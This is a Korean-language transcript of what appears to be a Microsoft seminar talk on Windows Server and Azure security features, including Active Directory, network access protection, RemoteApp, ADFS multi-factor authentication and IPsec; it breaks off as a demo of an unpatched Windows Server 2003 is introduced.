네, 안녕하세요. 저는 한국 마이크로소프트에서 테크니컬 이반젤리스트 기술 전도사를 맡고 있는 백승주라고 하고요. 앞서 정우진 대표께서 굉장히 재밌는 얘기를 많이 해주셨습니다. 네, 저도 엔지니어를 하면서 항상 제가 엔지니어를 이제 손을 뗄 때 자부했던 것 중에 한 가지가 뭐냐면 제가 있는 동안에는 제가 속한 회사에서는 단 한 번의 보안 사고도 없었다는 게 뭐 물론 이제 몇 년 전에 얘기긴 합니다만 있었는데요. 일단 오늘은요. 앞서 말씀하셨던 정우진 대표님께서 하셨던 얘기를 실제로 마이크로소프트가 기술로서 어떻게 구현하는지를 좀 설명해 드리고 간단하게 보여드리는 순서로 진행을 하겠습니다. 시간이 40분 정도밖에 되지 않기 때문에요. 아주 디테일한 내용까지는 보여드리기 되게 어렵고요. 저한테 만약에 추가적으로 궁금한 사항이 있으시다면 저희 회사 영업대표를 통해서 연락을 주시면 한 180분짜리 정도까지 만들 수 있지 않을까라고 하는 것이 제 생각입니다. 제가 마이크로소프트에 있으면서 가장 많이 들은 얘기 중에 한 가지입니다. 이거보다 사실 더 많이 들은 얘기가 뭐냐면요. 마이크로소프트의 윈도우 서버 보안이 너무 약하다. 가끔씩 저한테 이런 얘기 하세요. 너는 도대체 1년 동안 업무 평가를 어떻게 받니? 라는 질문을 친해지시면 질문하시면 계시는데요. 제일 많이 저한테 생각하시는 게 뭐냐면 쟤는 세미나 많이 하면은 업무 평가를 잘 받을 거야 라는 얘기를 되게 많이 하시는데 저는 세미나를 2009년도에 250개를 했을 때와 올해와 같이 한 120, 30개 정도 했을 때나 업무 평가에는 아무런 차이가 없습니다. 저는 1년에 2번 정도씩 혹시 받으신 분 계실 건데요. 그 개인의 이메일로 마이크로소프트를 어떻게 생각하십니까 해서 서버 질문들 막 있는 거 받아보시면 계실 거예요. 그거 긁으시면 저 욕하시는 거랑 똑같은 겁니다. 그걸 1년에 2번씩 하게 되고요. 그걸 가지고 제가 1년 동안에 업무평가를 받게 됩니다. 말 그대로 밖에 나가서 많은 분들을 뵙고 네가 마이크로소프트에서 어떤 생각을 전파했느냐 이걸 그냥 말 그대로 보는 잣대이고요. 제일 안 좋았을 때가 윈도우 비스타 나왔을 때가 제일 안 좋았었고요. 아직까지도 그걸 1년에 2번씩 받으면 선생님들이 쓰신 말씀이 다 적혀 있습니다. 말 그대로 거기에 밝히지 않는다 해놓으시면요. 이름도 안 나오고 아무것도 안 나오면서 의견만 나오세요. 근데 거기에 제일 많이 아직까지 적혀 있는 게 한 가지가 옛날보다 굉장히 줄었습니다만 마이크로소프트의 보안이 약해가지고 내가 쓰기 되게 어렵다 는 얘기를 되게 많이 하시는데 아주 아이러니한 거는 제가 마이크로소프트 들어와서 한 1000여 번의 세미나를 하면서 단 한 번도 윈도우 서버 그 자체를 해킹당했다는 분은 한 번도 못 봤습니다. 그 위에 깔려있는 무언가가 제 조건에 이제 반드시 들어가는 게 패치가 다 됐다는 조건은 들어가야 합니다. 그거 이외에 마이크로소프트 솔루션 그 자체만 가지고 해킹을 당했거나 크래킹을 당했다는 사례는 저는 아직까지 본 적이 없어요. 그 위에 뭐가 올라가가지고 그 프로그램에서 문제가 생기면 사실 타겟으로 잡기 제일 좋은 회사가 마이크로소프트입니다. 제일 좋게 많이 말씀하시는 게 인터넷에 보면은 윈도우에 버그가 너무 많아서 물론 버그가 있죠. 윈도우에도 소프트웨어는 다 버그가 있습니다. 그렇지만 그게 정말로 윈도우의 버그 때문에 발생한 보안 오류인지는 아무도 모르고요. 그냥 말 그대로 지금까지 윈도우가 보안이 약했기 때문에 쟤는 여전히 약하다는 생각을 하는 것들이 되게 많으신 셈이고요. 제가 제일 많이 들었던 게 이거였었어요. 너네는 왜 보안 솔루션을 따로 안 파냐는데 아까 정우진 수석께서 말씀하셨던 대표적인 얘기의 흐름은 뭐였었냐면 말 그대로 운영체제가 상당히 많은 부분을 가지고 있다는 겁니다. 운영체제가. 근데요. 제가요. 마이크로소프트 2006년 10월 30일에 들어와가지고 지금까지의 세미나를 진행하면서 아까와 같은 정우진 대표님 장표처럼 만들어 본 장표가 있긴 합니다. 마이크로소프트의 기술만 가지고 보안을 통째로 다 구성을 하면은 이런 식으로 제품을 도배하면은 올 마이크로소프트 솔루션으로 도배할 수 있습니다. 물론요. 누구도 원하지 않으십니다. 이렇게 되면은 마이크로소프트가 뭔가를 잡아먹는다는 생각을 하시는지 이 중에 몇 개는 트렌드가 바뀜으로써 없어진 것도 있고 이건 언제 만든 장표냐면 제가 2008년도 정도에 만든 장표입니다. 전 모든 영역에 대해서 유니파이드 시큐리티 컨셉으로 전체를 다 제공하고 있고요. 원래는 2009년에 또 무슨 제품까지 만들려고 그랬어요. 지금은 결국엔 안 만드는 걸 했습니다만 이 중에 어느 하나라도 문제가 발생을 하면 이 솔루션 전체를 주무르는 시큐리티 오케스트레이터도 만들려고 그랬었습니다. 이 포인트 중에서 하나가 문제가 생기면 걔와 연관된 모든 거의 연결을 다 끊어버리는 겁니다. 사용자도 뜯어버리는 형태로 되어져 있고요. 그래서 코드네임 스털링이라는 걸 개발했었는데 그 팀이 이 모든 제품을 연계하다가 결국 보안 트렌드가 바뀌면서 안 하는 걸로 없어진 제품이 하나가 있고요. 근데 오늘은 이 얘기를 드리는 것이 아니라 아까 정우진 대표께서 말씀하셨던 것 핵심은 저희 회사에서 사이트에서 검색을 해보시면 디펜스 인 뎁스라고 하는 컨셉이 있습니다. 뭐냐면 하나가 뚫리더라도 그 다음 걸로 막으면 된다는 겁니다. 그 다음에 또 뚫리면 그 다음 걸로 막을 수가 있다는 것이고요. 이런 식의 양파 껍질과 같은 모양이 이미 우리가 사용하고 있는 윈도우 오퍼레이팅 시스템 안에 다 들어있다는 겁니다. 2주 전에 제가 윈도우 서버 2003 EOS를 왜 말씀을 드렸냐면요. 제가 개인적으로 친한 그
보안업계에 있는 사람이 있어요. 동생 놈이 하나가 있는데 그 친구가 낮에는 보안업체라고 옛날에 밤에는 해킹하는 친구인데 요새 밤일은 접었고요. 낮에 이제 보안 일만 하고 있는데 그 친구한테 제가 윈도우 서버에 대한 시큐리티 얘기를 술자리에서 되게 많이 물어봅니다. 서로요. 근데 그 친구가 했던 얘기가 뭐냐면요. 뚫으려고 하면 얼마든지 다 뚫을 수 있대요. 어둠 업계에서는요. 그런데 윈도우가 점점 어떤 식이 돼가냐면은 하나를 뚫으면 그 다음에 뭐가 튀어나오고 하나를 뚫으면 뭐가 튀어나와가지고 이거 다 뚫고 들어가는 게 너무 귀찮다는 겁니다. 차라리 그 뚫을 시간 공부할 시간에 오픈소스의 소스를 리버스 엔지니어링해서 거기서 취약점 찾는 게 더 빠르다는 얘기를 할 정도로 윈도우가 굉장히 다양한 양파 껍질을 가지고 있습니다. 이 중에서 운영체제 얘기만을 할 수 있는 것이 아니라 요새는 또 한 가지 트렌드가 생기면서 실제로 구축하는 방법이 있고 실제로 구축하지 않고 빌려 쓰는 클라우드 방법이 생겼습니다. 그리고 이 둘을 적절하게 믹스를 해가지고 이 둘을 같이 쓰는 하이브리드 클라우드 컨셉이 되게 많이 생겼다는 것이죠. 그래서 아예 이런 생각까지도 이제 저는 가끔씩 엔지니어 분들이랑 술 한잔 먹으면서 얘기를 하는데요. 망분리를 사내에서 망분리하는 게 아니라요. 자주 쓰는 어플리케이션 아예 밖에 놔버리는 거예요. 아예. 인터넷 프로그램 같은 경우는. 그래서 우리 회사 내에서는 이 컴퓨터가 아예 눈에 보이지 않고 외부망을 써야 될 때는 그냥 원격에 들어가서 거기서 쓰시라는 거죠. 완전히. 네트워크를 논리적으로 뜯어놓은 것이 아니라 아예 지역적으로 분리하는 방법까지 생각할 수가 있다는 것이고요. 물론 법규라든가 업계에 따라서 이런 것들을 할 수 없는 영역이 있습니다만 이 두 개를 적절하게 혼합하면서 쓸 수 있는 영역들이 되게 많다는 겁니다. 그중에 첫 번째로 얘기하셨던 것이 바로 무엇이냐면 아이덴티티에 대한 얘기였습니다. 마이크로소프트는 철저하게 내가 누구냐는 걸로 보안을 시작을 하게 됩니다. 내가 누군지에 따라서 컴퓨터의 세팅이 바뀌고요. 내가 누군지에 따라서 할 수 있는 일이 바뀌게 됩니다. 저희가 광화문 사옥으로 이사오고 나온 다음에 뭐 포스코에서도 비슷했습니다만 한 가지 크게 달라진 점이 뭐냐면요. 저희 회사에 R&D가 있다는 거 아실 거예요. 같이. R&D 층으로 들어가려면 일반 한국 소속의 직원증을 갖다 대면 문이 열리지 않습니다. R&D 영역으로 들어가려면요. 거기를 열려 그러면 또 승인을 받아야 돼요. 많은 사람의 사인오프를 받습니다. 그건 쉽게는 이런 거죠. 외국계 기업과 우리나라 기업의 가장 큰 차이는요. 전 이거 같아요. 제가 느낀 거예요. 인지영 원장님. 우리나라는 아까 정우진 대표께서 말씀하신 대로 다 못하게 놓습니다. 가보면요. 그러고 문제가 생기면 우리는 보안에 준하는 액션을 다 했다는 게 책임의 회피가 됩니다. 우리 이렇게 했기 때문에 문제가 없이 노력했다. 이거 증명이지 않습니까? 법적으로도. 근데 외국계 회사는 되게 심플한 게 다 열어놔요. 일단은요. 그리고 기술적으로 다 방어하는데요. 혹시라도 보안 사고 생기면 대표 이런 거죠. 윈도우 개발하는 뭐 빌드가 유출됐다 이런 얘기 많이 들어보셨죠? 결국 잡아내거든요. 어떻게 되냐, 누가 가져가는지. 그러면 저희 심플하게 어떻게 되냐면 그 사람 매니저 두 사람 나가면 됩니다. 두 사람 기본적으로. 왜냐하면 보안에 대한 책임을 시작하는 것이 사람이고 사람에 대한 아이덴티티로 연계되기 때문에 누군가를 보안이란 이름 하에서 예외를 두지 않고 흘러가게 됩니다. 그런 입장에서 가장 먼저 생각해야 되는 것이 당연히 아이덴티티에 대한 얘기라는 것이죠. 근데 이 아이덴티티가 편한 입장에서는 싱글 사인온 입장에서 필요한 것이죠. 어제도 제가 MTA 이제 다른 고객분들을 모시고 진행을 했었는데 그때는 50분 내내 아이덴티티 얘기만 드렸었는데요. 내가 누군지를 PC와 태블릿과 스마트폰이 동일하게 맞추는 작업이 필요하다는 겁니다. 근데 지금까지 우리가 썼던 대부분의 아이덴티티는 기업 내에서는 PC용에 불과한 것들이 되게 많다는 것이고요. 그리고 사용하는 기계가 회사와의 연결을 지원하지 않는 속칭 컨슈머 디바이스도 되게 많다는 것이죠. 그러면 이 기계가 누구인지 어떻게 관리할 것인지에 대해서는 당연히 시작은 마이크로소프트는 액티브 디렉토리로 시작을 하게 됩니다. 그래서 두 가지 데모를 보여드릴 건데요. 첫 번째 데모는 왜 웃는 표시를 해놓았냐면요. 시간이 워낙 없기 때문에 제가 그룹 정책까지 보여드려야 될지는 잘 모르겠습니다. 액티브 디렉토리가 나온 지 벌써 15년이 된 기술이고요. 말 그대로 컴퓨터에서 필요한 경우에 중앙 관리자가 윈도우에 대한 설정을 모두 다 반영을 시켜가지고 특정한 기능을 막아버리는 것을 그룹 정책이라고 얘기를 하고 있습니다. 그래서 지금 저는 로컬 컴퓨터에서 하고 있지만 만약에 서버 관리자가 있다면 해당 서버 관리자가 중앙에 있는 도메인 컨트롤러에서 특정한 설정을 만든 그룹 정책을 만들어 놓고요. 이 그룹 정책 안에서 세팅을 해놓으면 이것은 PC로 다 내려가는 구조로 되어져 있다는 것이죠. 그리고 이 정책은 PC에서 설정한 것보다 우선하게 적용이 되고 회피할 수 있는 방법은 없게 됩니다. 제가 이걸 말씀해서 제일 많이 또 여쭤보신 게 뭐냐면 AD 밖으로 나가면 어떡할 거냐는 얘기를 되게 많이 하세요. AD 밖으로 나가면. 즉 사용자가 컴퓨터를 잘 아는 사람이 컴퓨터 속성에 가가지고 컴퓨터 이름 변경해 가면은 여기서 액티브 디렉토리를 바꿀 수 있죠. 워크그룹으로요. 그럼 나가면 어떡할 거냐는 거예요. 그래서 제일 많이 또 여쭈시는 게 이거 막을 수 있는 방법이 없느냐. 뭐 물론
여러 가지 방법을 통해서 막을 수 있습니다만 이런 방법도 되게 필요할 수가 있다는 겁니다. AD에 나가면요. 업무를 못하게 할 수 있는 방안이 분명히 있습니다. 마이크로소프트는 AD에서 나가는 건 자유입니다. 직원이. 나간과 동시에 못 들어가는 LOB 사이트들이 속출하기 시작을 합니다. 뒤에 다시 말씀드리겠습니다만 AD에 대한 부분을 단순하게 AD만으로 해야 되는 것이 아니라 이어지는 뭐 네트워크라든가 여러 가지 통제 기능을 연계해서 관리를 하셔야 되는 방안이 있다는 것이고요. 두 번째로 오늘 또 한 가지 소개해드릴 내용은 우리가 보통 AD를 사용하는 이유는 가장 쉬운 예로는 여기서 계정을 만들어가지고 이 계정을 가지고 사용자의 싱글 사인온을 위해서 사용합니다. 그리고 이것을 모빌리티 디바이스를 사용하시려고 한다면 당연히 페더레이션이라든가 어떤 웹 형태로 바꾸셔가지고 연결하신다는 것이죠. 그런데 이제는 만약에 사내용이 아니라 외부 사용자라든가 뭐 파트너라든가 이런 용어를 할 때 또 한 가지로 제시될 수 있는 것이 마이크로소프트 애저라고 하는 퍼블릭 클라우드가 있다는 걸 잘 아실 겁니다. 퍼블릭 클라우드의 화면이 이런 형태인데요. 얘는 말 그대로 퍼블릭 클라우드이기 때문에 우리 눈에 보이지 않고 쓸 만큼 돈 내시는 형태로 되어져 있습니다. 필요한 경우에 새로 만들기를 클릭을 하면은요. 여기서도 액티브 디렉토리를 만들 수 있게 되어져 있고요. 얘는 도메인 컨트롤은 아닙니다. 인증용 데이터베이스고요. 이름을 코알라 데모라고 집어넣고요. 여기서 사용할 URL을 집어넣고요. 얘가 어느 나라에서 서비스 될 거냐는 겁니다. 그러면은 지금 이런 보시는 것처럼 코알라 demo.onmicrosoft.com이라는 이름을 가진 AD가 생기는 겁니다. 그럼 많이 여쭈신 게 이 이름 회사 이름 아니지 않아라는 얘기를 되게 많이 하세요. 만들어 보죠. 그럼 일단 제가 코알라 demo.onmicrosoft.com이라고 하는 AD를 지금 이렇게 생성을 하고 있습니다. 생각보다 빠른 속도로 만들어질 겁니다. 물론 퍼블릭 클라우드 때문에 서버가 바쁘면 조금 평소보다는 늦게 만들어지기도 합니다. 만들어졌죠. 얘를 클릭을 해보면 여기에 도메인이라는 항목을 넣을 수가 있게 되어져 있어요. 그래서 커스텀 도메인을 추가하면은 여기서 실제로 선생님들이 쓰시는 뭐 코알라 코리아.코알라.com 이런 식으로 URL을 집어넣으면 당연히 해당되는 도메인이 이런 식으로 추가가 되게 됩니다. 그럼 이 다음에 이제 사용자를 생성을 하실 때 해당되는 주소를 쓸 수 있게 바뀌게 되는데요. 왜 안 나오냐면 제가 해당되는 도메인의 실제 주인인지를 확인받지 않았기 때문입니다. DNS를 통해서 정말로 해당되는 도메인을 갖고 있는지를 확인한 이후에 해당되는 내용이 액티브로 변경이 되게 되고요. 액티브로 변경이 된 이후에는 사용자를 제가 실제로 액티브 되어지는 거죠. 코알라.com이 만들어져 있죠. 이런 경우에 새로 사용자를 추가를 누르면 여기서 바로 코알라.com의 사용자를 만들어가지고 집어넣을 수 있게 되거나 아니면은 반대로 사내 AD에서 연결해가지고 외부 사용자와 내부 사용자를 한 디렉토리로 관리할 수 있게 된다는 것이죠. 디렉토리 싱크 컨셉이 있다 보시면 된다는 것입니다. 이렇게 만들어진 AD를 인증용으로 사용하는 것이 가능해졌습니다. 굉장히 최근에 나온 컨셉이고요. 아마 7월부터 상당히 많은 세미나가 이쪽에 대한 얘기가 많을 거라고 생각을 합니다. 근데 주의하실 점은 애저에 있는 AD는 가입하는 AD가 아닙니다. 보통 많이 여쭤보시는 게 우리 회사에 있는 PC를 여기다 조인시켜가서 그룹 정책만 수준에 되게 많이 물어보시는데 그런 형태는 아니고요. 말 그대로 아이덴티티만 만들어가지고 아이덴티티한 일원화를 할 수 있는 창구이기도 하고요. 해외에 나가 있는 사용자가 한국까지 인증받는 시간이 오래 걸리지 않습니까? 그런 경우에 애저 데이터 센터에서 인증을 받고 처리되는 컨셉이라고 생각하시면 됩니다. 그다음 두 번째가 이제 네트워크 관점인데요. 네트워크를 어떻게 뜯을 거냐는 겁니다. 가장 많이 하시는 게 망분리 형태인 거죠. 망분리도 두 종류가 있죠. OS에다 컴포넌트 깔아서 하는 CBC 방식이 있고요. 아예 망을 뜯어버리는 가상화 관점이 있을 수가 있습니다. 어떤 걸 뭐 좋냐 나쁘냐는 사실은 외국계 기업에 있는 마이크로소프트나 VM웨어나 시트릭스는 다 CBC는 망분리가 아니라 그럽니다. 컴퓨터 내에서 그냥 분리시켜버리는 형태이기 때문에 아예 머신을 뜯어야 된다 얘기를 하고 있는데요. 이런 형태로 구축하는 방법이 데스크탑을 뜯을 수 있는 방법이 있고요. 두 번째로는 쓰는 프로그램별로 뜯을 수가 있다는 것이죠. 근데 아예 쓸 때 망을 아까 말씀드린 것처럼 지역을 분리하는 방안도 있을 수가 있다는 것이고요. 두 번째로는 혹시 이거 쓰시는 거 계신가요? 802.1x 회사에서 네트워크 연결하면 사용자를 인증을 받았는지 안 받는지 체크한 이후에 사용자가 인증을 받지 않았으면은 회사 내에 네트워크를 연결할 수 없는 VLAN으로 떨어뜨려 버리고 아니면 IP 영역을 바꿔버리고 인증을 받은 사용자라면 회사 네트워크를 연결하는 경우에 대해서 그리고 또 많은 엔지니어와 얘기하는 거지만 아직까지도 보안을 이유로 고정 IP를 쓰시는 회사가 굉장히 많습니다. 우리나라 큰 기업들은 거의 다 고정 IP를 많이 쓰고 계시는데요. 이유는 보안 때문에 그렇다 말씀을 하세요.
근데 그러면 이제 디바이스가 나타나고 새로운 컴퓨터가 나타날 때마다 IT팀의 가장 말단은 뭐라냐면 IP 넣어주러 다니는 겁니다. 근데 이런 방식보다는 유동 IP 기반으로 하면서 역시나 사용자와 붙여서 같이 돌릴 수 있는 방안이 필요하다는 것 800.1x도 일반적인 기술이고요. 이 레디우스라는 기술이 운영체제와 연계하는 기술입니다. 그러면 사용자가 랜선을 연결했을 때 이 컴퓨터에 로그인한 계정을 회사의 서버로 보낸 이후에 정상적인 인증이 된 사용자라면 IP가 떨어지는 거고요. 인증되지 않은 사용자는 IP가 안 떨어지는 것이죠. 물론 또 이런 얘기 하시죠. 고정 IP 집어넣으면 어떡할 거냐. 그 얘기도 이제 잠시 하도록 하겠습니다. 마지막으로는 뭘 얘기를 드려야 되냐면 사용자가 잘 쓰다가 나쁜 짓 했을 때 어떻게 뜯어낼 거냐는 겁니다. 보통 우리나라 같은 경우는 입구에서 검사 다 하고 거기만 통과한 이후에는 어떻게 됩니까? 사실은 검사를 안 하게 됩니다. 그래서 제가 세미나 할 때 저는 무조건 제 노트북으로 세미나를 해야 된다는 억지 주장이 좀 있습니다. 억지 주장이 아니라 데모 때문에 보통 많이 그렇게 하는데요. 그런 경우에 가장 심한 경우에는 뭐로 하냐면 내가 갖고 들어갈게, 직원분이. 그래서 자기 거 넣으세요. 그러고 경비한테 인사 딱 하고 그냥 갖고 들어가세요. 그리고 다시 나올 때 어떻게 하시죠? 그분이 다시 갖고 나와서 앞에 있는 커피집에 다시 주세요. 뭐 그런 거 사실은 제 편의성 때문에 그런 겁니다만 사용자가 한번 통과한 이후에는 검사를 받지 않는다는 거. 이런 거죠. USB 다 입구에서 뺐잖아요. 대부분이 큰 회사 같은 경우는요. 그건 어떨까요? USB를 컴퓨터에 꽂으면요. 아예 이 컴퓨터가 다 락이 걸려버리는 거예요. 네트워크가 뜯어지거나 아니 완전히 뭔가가 못하는 형태가 되거나 아예 원천적으로 USB가 안 되면 최고겠지만요. 이런 식의 기술을 마이크로소프트는 소프트웨어로 구현한 것을 랩이라고 표현하고 있고요. 그다음에 시스코에서는 장비 레벨로 표현하는 것을 락이라고 표현을 하고 있습니다. 두 가지를 보여드릴 겁니다. 첫 번째는 리모트 앱이라고 하는 기술입니다. 이건 많은 분들께서 엔지니어를 한 번쯤 보셨을 만한 기술인데요. 이건 하나 보여드릴 거고 두 번째로는 네트워크 억세스 프로텍션, 사용자가 회사에서 정한 보안 정책을 위배했을 때 네트워크를 뜯어내는 기술, 운영체제에 있는 기술입니다. 이것을 두 가지를 보여드리겠습니다. 첫 번째로 보여드릴 거는 바로 얘인데요. 윈도우 서버를 가지고 이런 식으로 로그인을 하면은요. 이렇게 어플리케이션을 제공해 주는 것을 리모트 앱이라고 표현을 합니다. 그럼 제가 얘를 클릭을 하면은 어딘가에서 사용자 계정과 암호를 인증을 받고요. 로그인을 하면은 잠시 후에 워드가 실행이 됩니다. 이 워드는 현재 제 컴퓨터와는 별개의 장소에서 실행이 되는 것이겠죠. 어디서 돌아가는 걸까요? 별도로 분리된 네트워크에서 구성이 돼서 운영되게 만들 수가 있습니다. 그럼 여기서 보이는 저장 장치도 당연히 다른 장치가 되는 것이고요. 그렇지만 이 경우는 엔지니어가 이 모든 것을 다 어떻게 됩니까? 세팅을 해서 구성을 해줘야 된다고 하는 추가적인 작업이 필요합니다. 얘를 내버려둔 상태에서요. 연결한다 그러고요. 근데 최근에 마이크로소프트 애저에서 또 어떤 기술이 생겼냐면요. 제가 하나 앞으로 가볼게요. 여기에 보시면 이렇게 리모트 앱이라고 현재는 프리뷰잉 기술이 하나 생겼습니다. 얘는 말 그대로 리모트 앱 서버를 어디다 만들어 오는 거냐면 애저에다 만들어 주는 겁니다. 아예 마이크로소프트가 아니라. 그러면 이 중에 한 개를 제가 클릭을 해볼게요. 미리 만들어 놓은 거를요. 클릭을 들어가면요. 아이고, 지금 제 서버에서 실행되는 워드가 실행이 됐고요. 제가 여기서 들어가서 리모트 앱 프로그램에 가보면 여기에서 제공하는 프로그램들을 원하면은 알아서 체크를 해가지고 퍼블리싱을 시킬 수가 있어요. 이 서버에다 깔아놓은 거죠, 당연히요. 기본적으로는 애저에서는 오피스를 제공해 드리고 있습니다. 현재는요, 무료로. 그럼 여기서 내가 인터넷 익스플로러를 쓰고 싶다라고 한다면 인터넷 익스플로러 아니면은 사전에 우리 회사는 크롬을 쓴다라고 한다면 크롬이 만들어진 이미지를 별도로 넣을 수도 있습니다. 그래서 제가 미리 만들어 놓은 이미지가 여기는 코알라 앱이라는 것이고 여기는 프로그램이 하나도 없는데 추가를 눌러보면은 제가 만들었다는 걸 증명할 수 있는 것이 한글 버전이 나온다는 걸 볼 수가 있죠. 그럼 이렇게 만들어진 이후에 사용자는 회사가 정한 URL로 들어갑니다. 그래서 여기서 클라이언트 프로그램 하나 다운을 받게 되고요. 이 프로그램이 실행이 되면은 자기의 계정으로 로그인을 하게 됩니다. AD 계정으로. 그러면 지금 방금 전에 보시는 것 같이 어플리케이션 목록이 쭉 나와요. 여기서 실행된 인터넷 익스플로러는 어디서 실행되는 걸까요? 마이크로소프트의 싱가포르에 있는 서버에서 실행이 되는 I라고 보시면 된다는 겁니다. 이런 식으로 완전히 퍼블릭 클라우드망에서 서버를 만들어 놓고 프로그램을 배포할 수 있는 방안도 분명히 배포가 아니라 엄밀하게는 보여주는 형태로 서비스를 시켜주는 것이죠. 이렇게 구현하는 것이 방금 전에 보여드렸던 우리 서버에서 구현하는 방식이 한 가지가 있고요. 얘는 좀 내릴게요. 윈도우 서버 2008부터 제공했었고요. 최근에 똑같은 기술을
애저에서도 쓸 수 있게 이렇게 제공하는 것을 애저 리모트 앱이라고 표현을 합니다. 두 가지 방식을 혼용해서 애플리케이션을 서비스할 수 있는 방법이죠. 앱이라고 하는 거는요, 먼저 윈도우 서버에서 서버 세팅을 할 수가 있어요. 뭐냐면 우리 회사에서 보안을 위해서 검사할 영역이 어딘지를 설정할 수가 있다는 겁니다. 기본적으로는 방화벽, 백신, 스파이웨어, 자동 업데이트, 패치를 안 한 경우에 대해서 검사가 가능하고요. 원하시면 추가적인 개발을 통해 가지고 검사 영역을 넓힐 수는 있습니다. 그럼 사용자가 이런 정책을 따르지 않을 때 어떻게 액션을 만들 것인가에 대한 부분을 정하실 수가 있어요. 그러면 한 가지를 보여드리면요. 현재 해당되는 컴퓨터는 IP를 쳐보면 정상적으로 이렇게 IP 영역이 나오는 모습을 볼 수가 있습니다. 이 상태에서 사용자가 회사 내에서 하지 말라고 했던 업데이트를 강제로 꺼버리는 액션을 하게 되면요. 해당되는 IP 주소가 이렇게 격리되는 모습을 볼 수가 있고요. 이 순간부터는 네트워크 연결이 되지 않는 기술이라고 보시면 됩니다. 고정 IP 형태로 만들어지는 경우에 대해서는 잠시 후에 IP 시큐리티와 함께 설명을 드리도록 하겠고요. 지금 전 데모를 하기 위해서 해당되는 것을 수동으로 확인하고 있지만 서버 세팅에 따라서는 강제로 세팅을 변경하는 형태로 구성할 수도 있습니다. 정상적으로 IP 세팅을 바꿨더니 이번에는 IP 주소가 정상으로 나오는 모습을 볼 수가 있죠. 이렇게 네트워크에 대한 핸들링을 하는 기술도 제공을 하고 있습니다. 두 번째는요. 네트워크 관점의 부분인데요. 마이크로소프트는 2008-9년 이후에 네트워크 관점에 대한 별도의 솔루션은 더 이상 만들지 않는 방향으로 흘러가고 있습니다. 그때만 하더라도 파이어월 제품도 있었었고요. SSL VPN 제품도 있었어요. 그 제품의 이름이 뭐였냐면은 포프론트 어쩌고저쩌고였었습니다. 근데 그런 기술들을 없애는 것이 아니라 이 기술을 전부 다 윈도우 서버에 탑재하고 있습니다. 현재는요. 그래서 윈도우 서버 최신 버전에는 기존의 포프론트 TMG가 했던 역할을 일부러 가지고 있고요. SSL VPN 기능도 동일하게 가지고 있습니다. 더불어서 요새 많이 얘기하시는 것 중 한 가지가 뭐냐면 얘거든요. 멀티팩터 오센티케이션, OTP라든가 아니 문자를 받고 로그인을 한다거나 아니면은 인증서가 있는 경우에 로그인하게 하는 경우에 대해서도 모두 다 지원을 하고 있습니다. 이쪽에 대한 지원을 하는 기능은 ADFS라고 하는 AD와 연계된 기술로 하고 있고요. 간단하게 멀티팩터 오센티케이션이 어떻게 동작하는지를 또 한번 살펴보시도록 하겠습니다. 윈도우 8.1인데요. 여기서 제가 브라우저를 하나 열고요. 회사 내에 쉐어포인트 사이트에 로그인을 하는 겁니다. 그럼 당연히 제 최초에는 뭐가 일어나야 됩니까? 계정과 패스워드를 넣으라고 해야 됩니다. 이런 식으로 계정을 넣으면 어드미니스트레이터를 얻더니 방금 전에 당신은 보안상의 이유로 인증서 없으면 못 들어간다는 얘기가 나온다는 겁니다. 인증서가 없으면. 제가 어딘가에서 인증서를 쓴다라고 선언해놨기 때문에 인증서를 요구하는 것이고요. 제가 만약에 해당되는 사용자가 아니라 캐시를 정확하게 비우기 위해서 인프라이빗 브라우징을 열고요. 동일하게 친 다음에 코알라에서 제 계정을 넣고 들어가면 여기도 검사를 받으라고 나오네요. 예, 제 거 말고요. 그러면요. 제 계정도 관리자인가 보네요. 지금요. 들어가는 걸 보여드릴게요. 일반적인 사용자 계정을 하나 집어넣어 보겠습니다. 사용자를 넣으면 이번에는 인증서를 묻지 않고 넘어가서 쉐어포인트로 가는 걸 보실 수가 있습니다. 즉 어드민이 들어갈 때는 권한이 더 많기 때문에 사고 날 확률이 높지만 일반 사용자는 권한이 작기 때문에 그냥 들어가게 해주는 것. 이것을 액티브 디렉토리 페더레이션 서비스라는 것으로 핸들링하고 있고요. 지금 제가 보여드렸던 기능이 윈도우 서버 안에 있는 다단계 인증에서 도메인 어드민에 대해서는 반드시 다단계 인증을 밟으라고 설정해 놨기 때문입니다. 그리고 원하신다면 해당되는 웹사이트를 그대로 회사 외부로 퍼블리싱할 수 있는 와비라고 하는 기능, 옛날에 포프론트 TMG가 했던 일의 일부를 윈도우 서버가 그대로 제공한다는 것을 미리 보여드리는 것이고요. 얘는 쉽게는 이런 겁니다. 내부의 서버를 외부로 퍼블리싱하는 컨셉이라고 보시면 돼요. 그냥요. 근데 이 사이에 인증에 대한 처리를 별도로 할 수 있도록 이렇게 사전 인증에 대한 구성을 하실 수 있게 되어져 있습니다. 그래서 많은 분들께서 옛날에 포프론트가 했던 일이 어디로 갔냐는 질문을 많이 하셔가지고 제가 간단하게 보여드리고 전 줄여가지고 이것을 WAP라서 와비라고 부르고 있습니다. 호스트 방어에 대한 부분인데요. 두 가지 정도가 여기서는 굉장히 중요할 것 같은데요. 첫 번째로는 내부의 폭탄이 더 무섭다는 겁니다. 잘 아시겠지만. 보통 내부는 다 검사받은 사용자가 들어왔다 그래가지고 더 이상의 검사를 안 하시거나
윈도우에 있는 방화벽은 IT 관리자의 편의성 때문에 다 꺼버리신 거 되게 많으실 겁니다. 업데이트, 뭔가 규칙한 이유로 안 하시는 분도 되게 많으시고요. 세 번째에 있는 IP 시큐리티는 사실 마이크로소프트에서 보안을 관리하는 핵심 엔진입니다. 어떻게 보면요. 저희는 직원이냐 아니냐에 대한 구분을 IP 시큐리티 인증을 받기 위한 공인인증서가 있냐 없냐를 가지고 구분하게 됩니다. 해당 인증서는 AD에 들어가야지만 발급이 되게 되고요. 그러니까 아까 AD에 나가면 인증서가 없어지기 때문에 자연스럽게 통신이 안 되게 되는 겁니다. 그리고 서버를 보안을 강화할 수 있는 툴들 제공하고 있고요. 마지막으로는 아까 정훈진 대표께서 말씀하셨던 시큐어 부트라고 해서 부트 영역을 방어하는 기술이 윈도우 8부터 탑재가 돼 있어서 작년 3월 20일에 문제가 나는 것을 부트 영역을 방어할 수도 있었습니다. 세 가지를 보여드릴 건데요. 빠른 속도로 하겠습니다. 첫 번째는요. 이거는 얼마 전에 윈도우 서버 2003 EOS 때문에 세미나를 오셨던 분이라면 제가 윈도우 서버 2003 패치 안 된 거 해킹하는 거 보여드렸던 적이 있을 거예요. 해킹 안 된 무슨 일이 발생한 첫 번째 보여드리겠고요. 두 번째로는 IP 시큐리티 기술 보여드릴 거고요. 세 번째로는 업데이트에 대한 관리를 자동화할 수 있는 방법에 대해서 보여드리도록 하겠습니다. 지금요. 첫 번째로는요. 아직은 패치가 